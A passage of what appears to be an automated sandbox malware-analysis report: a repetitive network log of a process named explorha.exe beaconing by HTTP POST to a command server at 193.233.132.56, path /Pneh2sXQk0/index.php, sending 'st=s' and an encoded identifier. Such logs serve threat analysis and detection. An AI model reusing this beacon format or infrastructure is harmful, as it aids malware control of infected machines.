                                                                                                                                                                                                                                      Apr 19, 2024 03:29:42.379851103 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:42.380669117 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:42.629538059 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      30192.168.2.549814193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:42.997772932 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:43.242815971 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:43.243563890 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:43.492702007 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      31192.168.2.549815193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:43.869604111 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:44.118108988 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:44.120521069 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:44.373209000 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      32192.168.2.549817193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:44.816508055 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:45.059449911 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:45.060233116 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:45.307044983 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      33192.168.2.549820193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:45.661050081 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:45.905271053 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:45.906037092 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:46.155529976 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      34192.168.2.549821193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:46.506915092 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:46.758116007 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:46.758900881 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:47.009947062 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      35192.168.2.549823193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:47.367412090 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:47.616369009 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:47.618335009 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:47.873434067 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      36192.168.2.549824193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.233275890 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.482053995 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.483079910 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.737075090 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      37192.168.2.549828193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.100488901 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.348460913 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.349280119 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:49.603646040 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      38192.168.2.549829193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
